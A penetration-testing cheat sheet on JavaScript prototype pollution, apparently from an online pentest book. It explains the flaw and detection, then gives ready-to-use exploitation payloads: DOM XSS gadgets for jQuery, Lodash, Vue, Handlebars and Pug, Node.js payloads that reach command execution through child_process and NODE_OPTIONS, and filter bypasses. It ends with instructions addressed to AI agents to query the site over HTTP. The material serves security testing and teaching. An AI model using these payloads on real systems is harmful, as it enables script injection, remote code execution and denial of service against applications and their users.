# Prototype Pollution

Prototype pollution is a JavaScript vulnerability that allows attackers to modify the prototype of base objects, potentially leading to XSS, RCE, or DoS.

## How It Works

```javascript
// JavaScript objects inherit from Object.prototype
let obj = {};
console.log(obj.toString); // inherited from Object.prototype

// Pollution occurs when attacker controls property assignment
obj.__proto__.polluted = "yes";
// OR
obj["__proto__"]["polluted"] = "yes";
// OR
obj.constructor.prototype.polluted = "yes";

// Now ALL objects have this property
let newObj = {};
console.log(newObj.polluted); // "yes"
```

## Detection

### Manual Testing

```javascript
// Test in browser console or via URL parameters
// Check if prototype is pollutable

// Via URL query string
?__proto__[test]=polluted
?__proto__.test=polluted
?constructor[prototype][test]=polluted

// Via JSON body
{"__proto__": {"test": "polluted"}}
{"constructor": {"prototype": {"test": "polluted"}}}

// Verify pollution
Object.prototype.test === "polluted"
```

### Automated Detection

```bash
# PPScan - Prototype Pollution Scanner
# https://github.com/AhmedMohamedDev/PPScan
python3 ppscan.py -u "https://target.com/?param=value"

# Client-side prototype pollution scanner
# https://github.com/AhmedMohamedDev/ClientSidePrototypePollution
node ClientSidePrototypePollution.js -u "https://target.com"

# Burp extension - Server-Side Prototype Pollution Scanner
# https://github.com/AhmedMohamedDev/Burp-PrototypePollutionScanner

# ppmap - Prototype Pollution Exploiter
# https://github.com/AhmedMohamedDev/ppmap
ppmap -u "https://target.com"
```

## Common Sinks (Client-Side)

```javascript
// Object.assign
Object.assign({}, userInput);

// Lodash merge (before 4.17.21)
_.merge({}, userInput);
_.set({}, path, value);
_.setWith({}, path, value);

// jQuery extend
$.extend(true, {}, userInput);

// Deep merge libraries
deepmerge({}, userInput);
```

## Exploitation Payloads

### DOM XSS via Prototype Pollution

```javascript
// If application uses innerHTML with polluted properties
?__proto__[innerHTML]=<img/src/onerror=alert(1)>

// Pollute srcdoc for iframes
?__proto__[srcdoc]=<script>alert(1)</script>

// Pollute href for anchors
?__proto__[href]=javascript:alert(1)
```

### Gadgets for Common Libraries

```javascript
// jQuery < 3.4.0 (CVE-2019-11358)
$.extend(true, {}, JSON.parse('{"__proto__": {"test": "alert(1)"}}'));

// Lodash < 4.17.12 (CVE-2019-10744)
_.template('', {variable: 'x'}); // with polluted sourceURL
?__proto__[sourceURL]=\u000aAlert(1)//

// Vue.js
?__proto__[v-if]=_c.constructor('alert(1)')()

// Handlebars
?__proto__[pendingContent]=<script>alert(1)</script>

// Pug/Jade
?__proto__[block]={"type":"Text","val":"<script>alert(1)</script>"}
```

### Server-Side Prototype Pollution (Node.js)

```javascript
// RCE via child_process
{"__proto__": {"shell": "/proc/self/exe", "argv0": "console.log(require('child_process').execSync('id').toString())//"}}

// RCE via env pollution
{"__proto__": {"env": {"NODE_OPTIONS": "--require /proc/self/fd/0"}}}

// DoS via constructor pollution
{"__proto__": {"toString": "not a function"}}
```

## Bypass Techniques

```javascript
// Alternative property paths
constructor.prototype.polluted=1
__proto__.polluted=1
__proto__[polluted]=1

// Unicode encoding
\u005f\u005fproto\u005f\u005f

// Mixed case (rare)
__PROTO__

// Array pollution
[].__proto__.polluted=1
```

## Tools & Resources

```bash
# Scanning
https://github.com/AhmedMohamedDev/PPScan
https://github.com/AhmedMohamedDev/ClientSidePrototypePollution
https://github.com/AhmedMohamedDev/ppmap

# Gadget database
https://github.com/AhmedMohamedDev/client-side-prototype-pollution

# Burp Extension
https://portswigger.net/bappstore/c1d4bd60626d4178a54d36ee802cf7e8
```

## Related Topics

* [XSS](/enumeration/web/xss.md) - Prototype pollution often chains to XSS
* [Deserialization](/enumeration/web/deserialization.md) - Similar object manipulation concepts
* [SSTI](/enumeration/web/ssti.md) - Template engines can be affected


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.pentest-book.com/enumeration/web/prototype-pollution.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.